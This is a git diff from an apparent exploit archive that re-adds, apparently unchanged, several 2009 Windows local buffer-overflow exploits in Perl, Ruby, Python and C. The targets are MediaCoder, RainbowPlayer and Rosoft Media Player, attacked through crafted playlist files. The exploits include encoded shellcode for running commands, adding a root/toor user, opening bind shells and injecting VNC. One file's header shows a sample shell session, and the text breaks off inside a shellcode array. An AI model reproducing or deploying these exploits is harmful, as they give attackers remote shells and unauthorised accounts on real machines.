"\x4b\x45\x4a\x30\x43\x55\x4a\x56\x50\x38\x50\x34\x50\x50\x4e\x4e". + "\x4f\x4f\x48\x4d\x49\x48\x47\x4c\x41\x58\x4e\x4e\x42\x50\x41\x50". + "\x42\x50\x42\x30\x47\x45\x48\x55\x43\x45\x49\x38\x45\x4e\x4a\x4e". + "\x47\x52\x42\x30\x42\x30\x42\x30\x42\x59\x41\x50\x42\x30\x42\x50". + "\x48\x4b\x49\x51\x4a\x51\x47\x4e\x46\x4a\x49\x31\x42\x47\x49\x4e". + "\x45\x4e\x49\x54\x48\x58\x49\x54\x46\x4a\x4c\x51\x42\x37\x47\x4c". + "\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x49\x4d\x49\x50\x45\x4f\x4d\x4a". + "\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x43\x47\x45\x43\x35\x44\x33\x4f\x45". + "\x43\x33\x44\x43\x42\x30\x4b\x45\x4d\x38\x4b\x34\x42\x42\x41\x55". + "\x4f\x4f\x47\x4d\x49\x58\x4f\x4d\x49\x38\x43\x4c\x4d\x58\x45\x47". + "\x46\x41\x4c\x36\x47\x30\x49\x45\x41\x35\x43\x45\x4f\x4f\x46\x43". + "\x4f\x38\x4f\x4f\x45\x35\x46\x50\x49\x35\x49\x58\x46\x50\x50\x48". + "\x44\x4e\x44\x4f\x4b\x32\x47\x52\x46\x35\x4f\x4f\x47\x43\x4f\x4f". + "\x45\x35\x42\x43\x41\x53\x42\x4c\x42\x45\x42\x35\x42\x35\x42\x55". + "\x42\x54\x42\x55\x42\x44\x42\x35\x4f\x4f\x45\x45\x4e\x32\x49\x48". + "\x47\x4c\x41\x53\x4b\x4d\x43\x45\x43\x45\x4a\x46\x44\x30\x42\x50". 
+ "\x41\x31\x4e\x55\x49\x48\x42\x4e\x4c\x36\x42\x31\x42\x35\x47\x55". + "\x4f\x4f\x45\x35\x46\x32\x43\x55\x47\x45\x4f\x4f\x45\x45\x4a\x32". + "\x43\x55\x46\x35\x47\x45\x4f\x4f\x45\x55\x42\x32\x49\x48\x47\x4c". + "\x41\x58\x4e\x4e\x42\x50\x42\x31\x42\x50\x42\x50\x49\x58\x43\x4e". + "\x4c\x46\x42\x50\x4a\x46\x42\x30\x42\x51\x42\x30\x42\x30\x43\x35". + "\x47\x45\x4f\x4f\x45\x35\x4a\x31\x41\x58\x4e\x4e\x42\x30\x46\x30". + "\x42\x30\x42\x30\x4f\x4f\x43\x4d\x5a"; +$id = $ARGV[0]; +if ($id==1){ +print "$header.$junk.$ret.$nop.$calc_shell.$nop"; +exit; +} +if ($id==2){ +print "$header.$junk.$ret.$nop.$adduser_shell.$nop"; +exit; +} +if ($id==3){ +print "$header.$junk.$ret.$nop.$bind_shell.$nop"; +exit; +} +if ($id==4){ +print "$header.$junk.$ret.$nop.$bind_vncinject.$nop"; +exit; +} +print "\n"; +print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; +print " +++ +++\n"; +print " +++ +++\n"; +print " +++ MediaCoder 0.6.2.4275 Universal Stack-Based Overflow +++\n"; +print " +++ Written By Stack +++\n"; +print " +++ +++\n"; +print " +++ Usage Ex.: perl $0 1 >>Exploit.m3u +++\n"; +print " +++ +++\n"; +print " +++ Options: +++\n"; +print " +++ 1 - win32_exec calc.exe +++\n"; +print " +++ 2 - win32_adduser Pass=toor User=root +++\n"; +print " +++ 3 - win32_bind Port 5555 +++\n"; +print " +++ 4 - win32_bind_vncinject Port 5900 +++\n"; +print " +++ +++\n"; +print " +++ +++\n"; +print " +++ +++\n"; +print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; +exit; +#EOF + +# milw0rm.com [2009-03-09] diff --git a/platforms/windows/local/8179.rb b/platforms/windows/local/8179.rb index 6e3ca8bdd..de2110686 100755 --- a/platforms/windows/local/8179.rb +++ b/platforms/windows/local/8179.rb 
@@ -1,98 +1,98 @@ -#!/usr/bin/env ruby -# MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH) -# Universal SEH Overwrite Exploit -# By Stack -# Mountassif Moad -# Download app : http://mediacoder.sourceforge.net/mirrors.htm?file=MediaCoder-0.6.2.4275.exe -# cat Greatz.txt -# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z -# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d -# ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support -time3 = Time.new -puts "Exploit Started in Current Time :" + time3.inspect -puts "Enter Name For your File Like : Stack" -files = gets.chomp.capitalize -puts "Name Of File : " + files +'.m3u' -time1 = Time.new -$VERBOSE=nil -Header = -"\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46"+ -"\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F"+ -"\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20"+ -"\x0D\x0A\x44\x3A\x5C" -# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com -Shellscode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+ -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+ -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+ -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+ -"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47"+ -"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"+ -"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x58"+ -"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+ -"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+ -"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x57\x45\x4e\x4b\x48"+ 
-"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"+ -"\x4b\x48\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x48\x4e\x41\x4b\x58"+ -"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53"+ -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x57"+ -"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"+ -"\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"+ -"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x35\x41\x53"+ -"\x48\x4f\x42\x46\x48\x55\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x37"+ -"\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x36\x4a\x39"+ -"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x4d\x46"+ -"\x46\x56\x50\x52\x45\x36\x4a\x47\x45\x46\x42\x52\x4f\x32\x43\x46"+ -"\x42\x52\x50\x56\x45\x56\x46\x37\x42\x52\x45\x57\x43\x57\x45\x46"+ -"\x44\x37\x42\x32\x44\x47\x4f\x46\x4f\x56\x46\x37\x42\x32\x46\x37"+ -"\x4f\x36\x4f\x56\x44\x57\x42\x52\x4f\x42\x41\x44\x46\x54\x46\x34"+ -"\x42\x52\x48\x52\x48\x52\x42\x32\x50\x56\x45\x36\x46\x37\x42\x52"+ -"\x4e\x36\x4f\x46\x43\x56\x41\x56\x4e\x36\x47\x36\x44\x57\x4f\x36"+ -"\x45\x57\x42\x47\x42\x52\x41\x34\x46\x46\x4d\x36\x49\x46\x50\x56"+ -"\x49\x36\x43\x47\x46\x47\x44\x37\x41\x36\x46\x57\x4f\x56\x44\x57"+ -"\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x46\x46\x47\x42\x32\x4f\x32"+ -"\x41\x54\x46\x54\x46\x54\x42\x50\x5a" -# Media_bruteforcer_shellcode -Bruteforce = # BruteForce the shellcode to runing if it dont work in the first methode -"\xD0\x62\x43"+ # SHL BYTE PTR DS:[EDX+43],1 -"\x00\xB8\x6D"+ # ADD BYTE PTR DS:[EAX+1ABBB6D],BH -"\xBB\xAB\x01"+ -"\x00\x00"+ # ADD BYTE PTR DS:[EAX],AL -"\x00\xF0"+ # ADD AL,DH -"\xFF\x13"+ # CALL DWORD PTR DS:[EBX] -"\x00\x4F\x6D"+ # ADD BYTE PTR DS:[EDI+6D],CL -"\x81\x7C\x38\x07"+ # CMP DWORD PTR DS:[EAX+EDI+7],FFFF7C92 -"\x92\x7C\xFF"+ -"\xFF\xFF" + Shellscode -Rhunter = -"\x5B"+ #POP EBX -"\x90" * 10 + # NOP x 10 -"\x90\x90"+ # NOP NOP -"\x8D\x44\xC1\x04"+ # LEA EAX,DWORD PTR DS:[ECX+EAX*8+4] -"\x8B\x1E"+ # MOV 
EBX,DWORD PTR DS:[ESI] -"\x89\x18"+ # MOV DWORD PTR DS:[EAX],EBX -"\x89\x06"+ # MOV DWORD PTR DS:[ESI],EAX -"\x42"+ # INC EDX -"\x83\xFA\x64"+ # CMP EDX,64 -"\x75\xEC"+ # JNZ SHORT dsp_chmx.0169127E -"\x8B\x06"+ # MOV EAX,DWORD PTR DS:[ESI] -"\x8B\x10"+ # MOV EDX,DWORD PTR DS:[EAX] -"\x89\x16"+ # MOV DWORD PTR DS:[ESI],EDX -"\x5E"+ # POP ESI -"\x5B"+ # POP EBX -"\x93\x43"+ # CALL ESP -"\x92\x7c" -Over = "\x41" * 195 + "\xff\xff\xff\xff" + "\x47" * 4 + "\x42" * 6 + "\xff\xff\x47\x47\x47\xFF\x65\x78\x77\x76" -Nop = "\x90" * 8 -Next_Seh = "\xeb\x06\xff\xff" -Seh = "\x93\xB6\x98\x7C" -Nopsled = "\x90" * 7 -Xpl = Header + Over + Rhunter + Nop + Shellscode + Nopsled + Next_Seh + Seh + Nop + Bruteforce + Nopsled -File.open( files+".m3u", "w" ) do |the_file| -the_file.puts(Xpl) -puts "Exploit finished in Current Time :" + time1.inspect -puts "Now Open " + files +".m3u :d" -end - -# milw0rm.com [2009-03-09] +#!/usr/bin/env ruby +# MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH) +# Universal SEH Overwrite Exploit +# By Stack +# Mountassif Moad +# Download app : http://mediacoder.sourceforge.net/mirrors.htm?file=MediaCoder-0.6.2.4275.exe +# cat Greatz.txt +# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z +# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d +# ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support +time3 = Time.new +puts "Exploit Started in Current Time :" + time3.inspect +puts "Enter Name For your File Like : Stack" +files = gets.chomp.capitalize +puts "Name Of File : " + files +'.m3u' +time1 = Time.new +$VERBOSE=nil +Header = +"\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46"+ +"\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F"+ +"\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20"+ +"\x0D\x0A\x44\x3A\x5C" +# win32_adduser - PASS=toor 
EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com +Shellscode = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+ +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+ +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+ +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+ +"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47"+ +"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"+ +"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x58"+ +"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+ +"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+ +"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x57\x45\x4e\x4b\x48"+ +"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"+ +"\x4b\x48\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x48\x4e\x41\x4b\x58"+ +"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53"+ +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x57"+ +"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"+ +"\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"+ +"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x35\x41\x53"+ +"\x48\x4f\x42\x46\x48\x55\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x37"+ +"\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x36\x4a\x39"+ +"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x4d\x46"+ +"\x46\x56\x50\x52\x45\x36\x4a\x47\x45\x46\x42\x52\x4f\x32\x43\x46"+ +"\x42\x52\x50\x56\x45\x56\x46\x37\x42\x52\x45\x57\x43\x57\x45\x46"+ +"\x44\x37\x42\x32\x44\x47\x4f\x46\x4f\x56\x46\x37\x42\x32\x46\x37"+ +"\x4f\x36\x4f\x56\x44\x57\x42\x52\x4f\x42\x41\x44\x46\x54\x46\x34"+ +"\x42\x52\x48\x52\x48\x52\x42\x32\x50\x56\x45\x36\x46\x37\x42\x52"+ +"\x4e\x36\x4f\x46\x43\x56\x41\x56\x4e\x36\x47\x36\x44\x57\x4f\x36"+ 
+"\x45\x57\x42\x47\x42\x52\x41\x34\x46\x46\x4d\x36\x49\x46\x50\x56"+ +"\x49\x36\x43\x47\x46\x47\x44\x37\x41\x36\x46\x57\x4f\x56\x44\x57"+ +"\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x46\x46\x47\x42\x32\x4f\x32"+ +"\x41\x54\x46\x54\x46\x54\x42\x50\x5a" +# Media_bruteforcer_shellcode +Bruteforce = # BruteForce the shellcode to runing if it dont work in the first methode +"\xD0\x62\x43"+ # SHL BYTE PTR DS:[EDX+43],1 +"\x00\xB8\x6D"+ # ADD BYTE PTR DS:[EAX+1ABBB6D],BH +"\xBB\xAB\x01"+ +"\x00\x00"+ # ADD BYTE PTR DS:[EAX],AL +"\x00\xF0"+ # ADD AL,DH +"\xFF\x13"+ # CALL DWORD PTR DS:[EBX] +"\x00\x4F\x6D"+ # ADD BYTE PTR DS:[EDI+6D],CL +"\x81\x7C\x38\x07"+ # CMP DWORD PTR DS:[EAX+EDI+7],FFFF7C92 +"\x92\x7C\xFF"+ +"\xFF\xFF" + Shellscode +Rhunter = +"\x5B"+ #POP EBX +"\x90" * 10 + # NOP x 10 +"\x90\x90"+ # NOP NOP +"\x8D\x44\xC1\x04"+ # LEA EAX,DWORD PTR DS:[ECX+EAX*8+4] +"\x8B\x1E"+ # MOV EBX,DWORD PTR DS:[ESI] +"\x89\x18"+ # MOV DWORD PTR DS:[EAX],EBX +"\x89\x06"+ # MOV DWORD PTR DS:[ESI],EAX +"\x42"+ # INC EDX +"\x83\xFA\x64"+ # CMP EDX,64 +"\x75\xEC"+ # JNZ SHORT dsp_chmx.0169127E +"\x8B\x06"+ # MOV EAX,DWORD PTR DS:[ESI] +"\x8B\x10"+ # MOV EDX,DWORD PTR DS:[EAX] +"\x89\x16"+ # MOV DWORD PTR DS:[ESI],EDX +"\x5E"+ # POP ESI +"\x5B"+ # POP EBX +"\x93\x43"+ # CALL ESP +"\x92\x7c" +Over = "\x41" * 195 + "\xff\xff\xff\xff" + "\x47" * 4 + "\x42" * 6 + "\xff\xff\x47\x47\x47\xFF\x65\x78\x77\x76" +Nop = "\x90" * 8 +Next_Seh = "\xeb\x06\xff\xff" +Seh = "\x93\xB6\x98\x7C" +Nopsled = "\x90" * 7 +Xpl = Header + Over + Rhunter + Nop + Shellscode + Nopsled + Next_Seh + Seh + Nop + Bruteforce + Nopsled +File.open( files+".m3u", "w" ) do |the_file| +the_file.puts(Xpl) +puts "Exploit finished in Current Time :" + time1.inspect +puts "Now Open " + files +".m3u :d" +end + +# milw0rm.com [2009-03-09] diff --git a/platforms/windows/local/8193.py b/platforms/windows/local/8193.py index 51f60320b..ea2a252bf 100755 --- a/platforms/windows/local/8193.py +++ b/platforms/windows/local/8193.py 
@@ -1,59 +1,59 @@ -#usage: exploit.py -#Software download: http://www.nanocodesoft.com/products/rainbowplayer/rp091.exe -# -print "**************************************************************************" -print " RainbowPlayer 0.91 (playlist) Universal Seh Overwrite Exploit\n" -print " Author : His0k4" -print " Tested on: Windows XP Pro SP2 Fr\n" -print " Greetings to:" -print " All friends & muslims HaCkers(dz)\n" -print "**************************************************************************" - - -buff = "\x41" * 605 - -next_seh = "\xEB\x06\x41\x41" - -seh = "\x08\x2A\x01\x10" - - -header1= "\x22\x65\x78\x70\x6C\x6F\x69\x74\x2E\x6D\x70\x33\x22\x20\x30\x0A\x22\x43\x3A\x5C" -header2= "\x2E\x6D\x70\x33\x22" - -# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com -shellcode = ( - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" - "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x67" - "\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x77\x41\x42\x32\x42\x41\x32" - "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x6b\x59\x79\x6c\x6b" - "\x58\x37\x34\x53\x30\x35\x50\x53\x30\x6c\x4b\x41\x55\x47\x4c\x6c" - "\x4b\x51\x6c\x63\x35\x54\x38\x77\x71\x7a\x4f\x6e\x6b\x70\x4f\x74" - "\x58\x4e\x6b\x43\x6f\x37\x50\x43\x31\x5a\x4b\x47\x39\x4e\x6b\x37" - "\x44\x6c\x4b\x45\x51\x58\x6e\x37\x41\x6b\x70\x6c\x59\x6c\x6c\x4f" - "\x74\x6f\x30\x62\x54\x47\x77\x6b\x71\x59\x5a\x76\x6d\x74\x41\x6b" - "\x72\x58\x6b\x69\x64\x65\x6b\x41\x44\x47\x54\x34\x44\x44\x35\x38" - "\x65\x6e\x6b\x33\x6f\x31\x34\x37\x71\x6a\x4b\x51\x76\x6e\x6b\x44" - "\x4c\x42\x6b\x6e\x6b\x43\x6f\x57\x6c\x55\x51\x6a\x4b\x4c\x4b\x47" - "\x6c\x4e\x6b\x75\x51\x4a\x4b\x4e\x69\x31\x4c\x66\x44\x37\x74\x4f" - "\x33\x55\x61\x4f\x30\x30\x64\x6e\x6b\x77\x30\x36\x50\x4e\x65\x39" - "\x50\x31\x68\x64\x4c\x6c\x4b\x73\x70\x36\x6c\x6e\x6b\x30\x70\x37" - "\x6c\x6c\x6d\x4e\x6b\x45\x38\x45\x58\x58\x6b\x73\x39\x6e\x6b\x4b" - "\x30\x4e\x50\x75\x50\x73\x30\x63\x30\x6c\x4b\x45\x38\x65\x6c\x31" - 
"\x4f\x30\x31\x4c\x36\x75\x30\x32\x76\x6d\x59\x59\x68\x6c\x43\x4b" - "\x70\x41\x6b\x46\x30\x45\x38\x48\x70\x4e\x6a\x65\x54\x43\x6f\x71" - "\x78\x4f\x68\x59\x6e\x4c\x4a\x76\x6e\x52\x77\x6b\x4f\x6b\x57\x72" - "\x43\x53\x51\x30\x6c\x52\x43\x77\x70\x67" - ) - - -exploit = header1 + buff + next_seh + seh + shellcode + header2 - -try: - out_file = open("rainbow.rpl",'w') - out_file.write(exploit) - out_file.close() - print "Exploit file created!\n" -except: - print "Error" - -# milw0rm.com [2009-03-10] +#usage: exploit.py +#Software download: http://www.nanocodesoft.com/products/rainbowplayer/rp091.exe +# +print "**************************************************************************" +print " RainbowPlayer 0.91 (playlist) Universal Seh Overwrite Exploit\n" +print " Author : His0k4" +print " Tested on: Windows XP Pro SP2 Fr\n" +print " Greetings to:" +print " All friends & muslims HaCkers(dz)\n" +print "**************************************************************************" + + +buff = "\x41" * 605 + +next_seh = "\xEB\x06\x41\x41" + +seh = "\x08\x2A\x01\x10" + + +header1= "\x22\x65\x78\x70\x6C\x6F\x69\x74\x2E\x6D\x70\x33\x22\x20\x30\x0A\x22\x43\x3A\x5C" +header2= "\x2E\x6D\x70\x33\x22" + +# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com +shellcode = ( + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" + "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x67" + "\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x77\x41\x42\x32\x42\x41\x32" + "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x6b\x59\x79\x6c\x6b" + "\x58\x37\x34\x53\x30\x35\x50\x53\x30\x6c\x4b\x41\x55\x47\x4c\x6c" + "\x4b\x51\x6c\x63\x35\x54\x38\x77\x71\x7a\x4f\x6e\x6b\x70\x4f\x74" + "\x58\x4e\x6b\x43\x6f\x37\x50\x43\x31\x5a\x4b\x47\x39\x4e\x6b\x37" + "\x44\x6c\x4b\x45\x51\x58\x6e\x37\x41\x6b\x70\x6c\x59\x6c\x6c\x4f" + "\x74\x6f\x30\x62\x54\x47\x77\x6b\x71\x59\x5a\x76\x6d\x74\x41\x6b" + "\x72\x58\x6b\x69\x64\x65\x6b\x41\x44\x47\x54\x34\x44\x44\x35\x38" + 
"\x65\x6e\x6b\x33\x6f\x31\x34\x37\x71\x6a\x4b\x51\x76\x6e\x6b\x44" + "\x4c\x42\x6b\x6e\x6b\x43\x6f\x57\x6c\x55\x51\x6a\x4b\x4c\x4b\x47" + "\x6c\x4e\x6b\x75\x51\x4a\x4b\x4e\x69\x31\x4c\x66\x44\x37\x74\x4f" + "\x33\x55\x61\x4f\x30\x30\x64\x6e\x6b\x77\x30\x36\x50\x4e\x65\x39" + "\x50\x31\x68\x64\x4c\x6c\x4b\x73\x70\x36\x6c\x6e\x6b\x30\x70\x37" + "\x6c\x6c\x6d\x4e\x6b\x45\x38\x45\x58\x58\x6b\x73\x39\x6e\x6b\x4b" + "\x30\x4e\x50\x75\x50\x73\x30\x63\x30\x6c\x4b\x45\x38\x65\x6c\x31" + "\x4f\x30\x31\x4c\x36\x75\x30\x32\x76\x6d\x59\x59\x68\x6c\x43\x4b" + "\x70\x41\x6b\x46\x30\x45\x38\x48\x70\x4e\x6a\x65\x54\x43\x6f\x71" + "\x78\x4f\x68\x59\x6e\x4c\x4a\x76\x6e\x52\x77\x6b\x4f\x6b\x57\x72" + "\x43\x53\x51\x30\x6c\x52\x43\x77\x70\x67" + ) + + +exploit = header1 + buff + next_seh + seh + shellcode + header2 + +try: + out_file = open("rainbow.rpl",'w') + out_file.write(exploit) + out_file.close() + print "Exploit file created!\n" +except: + print "Error" + +# milw0rm.com [2009-03-10] diff --git a/platforms/windows/local/8214.c b/platforms/windows/local/8214.c index 3cccb6b0a..4e318fcd3 100755 --- a/platforms/windows/local/8214.c +++ b/platforms/windows/local/8214.c 
@@ -1,186 +1,186 @@ -/* rsmpf.c -* Rosoft media player free local buffer overflow Exploit multi targets -* Coded By : -* SimO-s0fT (Maroc-anti-connexion@hotmail.com) -* thanks To : Stack & fl0 fl0w & SKD -* and special thanks to str0ke for his advices and support ( you are the best brotha ) -* example : -* ########################################################################################## - # Coded By SimO-s0fT # -* # 0 [*]Microsoft Windows Trust SP3 (Frensh):ESP # -* # 1 [*]Microsoft Windows Trust SP2 (Frensh):ESP # -* # 2 [*]Microsoft Windows XP SP3 (Frensh) : ESP # -* # 3 [*]Microsoft Windows XP SP2 (Frensh) : ESP # -* # USAGE : # -* # exploit1.exe file.rml platform # -* # more information contact me { Maroc-anti-connexion[at]hotmail[dot]com } # -* # failed...: No such file or directory # -* # C:\Documents and Settings\The Fanopsis\Bureau>exploit1 simo.rml 0 # -* # [1] execute calc.exe # -* # [2] execute bindshell LPORT=7777 # -* # Choose a neumber : 2 # -* # simo.rml has been created! # -* # C:\Documents and Settings\The Fanopsis\Bureau>telnet 41.250.22.124 7777 # -* # Console - Windows Trust 3.0 (Service Pack 3: v55 # -* # # -* # (C) 1985-2008 Microsoft Corp. 
# -* # # -* # # -* # C:\Documents and Settings\The Fanopsis\Bureau> # -* ########################################################################################## -* -********************************************************************************************************/ -#include <stdio.h> -#include <string.h> -#include <stdlib.h> -#define OFFSET 4096 - -// calc (pour tester l'exploit) -char scode1[]= - "\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9" - "\x21\xdb\x5b\x83\xeb\xfc\xe2\xf4\x55\xc9\x9f\x5b\xa9\x21\x50\x1e" - "\x95\xaa\xa7\x5e\xd1\x20\x34\xd0\xe6\x39\x50\x04\x89\x20\x30\x12" - "\x22\x15\x50\x5a\x47\x10\x1b\xc2\x05\xa5\x1b\x2f\xae\xe0\x11\x56" - "\xa8\xe3\x30\xaf\x92\x75\xff\x5f\xdc\xc4\x50\x04\x8d\x20\x30\x3d" - "\x22\x2d\x90\xd0\xf6\x3d\xda\xb0\x22\x3d\x50\x5a\x42\xa8\x87\x7f" - "\xad\xe2\xea\x9b\xcd\xaa\x9b\x6b\x2c\xe1\xa3\x57\x22\x61\xd7\xd0" - "\xd9\x3d\x76\xd0\xc1\x29\x30\x52\x22\xa1\x6b\x5b\xa9\x21\x50\x33" - "\x95\x7e\xea\xad\xc9\x77\x52\xa3\x2a\xe1\xa0\x0b\xc1\xd1\x51\x5f" - "\xf6\x49\x43\xa5\x23\x2f\x8c\xa4\x4e\x42\xba\x37\xca\x0f\xbe\x23" - "\xcc\x21\xdb\x5b"; -//bind shell LPORT 7777 -char scode2[] = - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" - "\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61" - "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x41\x42\x41\x32" - "\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x39\x4b\x4c\x32" - "\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x6f\x39\x6f\x35" - "\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x65\x47\x4c\x6e" - "\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x4b\x70\x4f\x65" - "\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x59\x4c\x4b\x46" - "\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x69\x4e\x4c\x4b" - "\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x6d\x43\x31\x48" - "\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x38\x42\x55\x4b" - "\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x66\x4e\x6b\x46" - 
